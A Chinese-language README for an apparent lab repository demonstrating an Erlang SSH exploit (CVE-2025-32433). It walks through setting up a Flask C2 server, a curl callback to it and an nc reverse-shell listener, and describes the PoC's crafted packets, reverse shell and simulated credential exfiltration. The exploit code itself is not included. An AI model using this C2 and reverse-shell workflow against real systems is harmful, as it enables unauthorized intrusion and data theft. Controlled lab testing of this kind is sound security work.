这个仓库包含演示真实 CVE(CVE-2025-32433)的代码。
只在你有明确授权的环境中使用它。
绝不要针对你不拥有或管理的系统测试此漏洞利用程序。
未经授权的使用是非法的、不道德的,并且对网络安全社区有害。
CVE-2025-32433 的模拟与真实 PoC
我的兄弟 Chocapikk 给我看了这个发现的 PoC erling_cve.py,我很感兴趣,想在一个安全的环境中测试它。
对于这个仓库,你有两个选择:下面我列出的安全模拟脚本和系统。
或者你可以使用真正的 erling_cve.py(以合乎道德的方式、谨慎行事,并且只在你有权测试的网络上使用)。
在使用此工具测试或运行实际漏洞利用之前,先看看我的兄弟 m0usem0use 以及他用 Python 编写的用于查找 CVE-2025-32433 易受攻击目标的脚本!!!!
https://github.com/m0usem0use/erl_mouse
cve-2025-32433 漏洞利用的模拟版本
设置 C2 服务器
构建一个基于 Python Flask 的 C2:非常适合 bot 回连或反向 Shell。
在 C2 服务器上运行此设置脚本
apt update && apt install python3-pip git -y
sudo apt install python3-flask
mkdir ~/c2
cd ~/c2
nano c2_server.py (粘贴 c2_server 脚本,按需编辑)
运行
python3 c2_server.py
bot(或测试脚本)可以像这样通过 curl 回连:
curl -X POST http://:8080/report -d "Bot is online"
在 Kali 上设置 Python venv
mkdir ~/ssh-bot-lab && cd ~/ssh-bot-lab
创建 Python 虚拟环境
python3 -m venv venv
source venv/bin/activate
sudo apt install python3-requests
测试回调
nano test_callback.py (粘贴 test_callback 脚本,按需编辑)
运行回调
python3 test_callback.py
你现在正式拥有了
一个可用的 venv
一个在线云 C2
功能正常的回调注入
-你需要目标/受害机器上暴露(或模拟)一个 Erlang 进程或服务
Eerling_cve.py 是做什么的?
连接目标 IP 的 22 端口
发送伪造的 SSH 版本字符串
发送精心构造的数据包(很可能用于触发漏洞——试图滥用 Erlang 未记录的 SSH 处理程序或缓冲区溢出)
触发返回到攻击者 IP 的反向 Shell
通过运行 whoami、uname 等命令,并将伪造的“凭据外泄”写入 /tmp/exfil.log,来模拟后渗透利用
我们将采用我们找到的 Erlang 类 PoC,并
让它在 Kali venv 中可用
当“攻击”运行时,让它向我们的云 C2 报告
在受控实验室中合乎道德且安全地运行它
观察它生成 /tmp/exfil.log 以模拟被窃取的数据
在 Kali 机器上
nano poc_erlang_test.py
-粘贴 poc_erlang_test.py 并按需编辑
打开监听器
在一个新终端中运行
nc -lvnp 4444
运行 PoC
python poc_erlang_test.py --real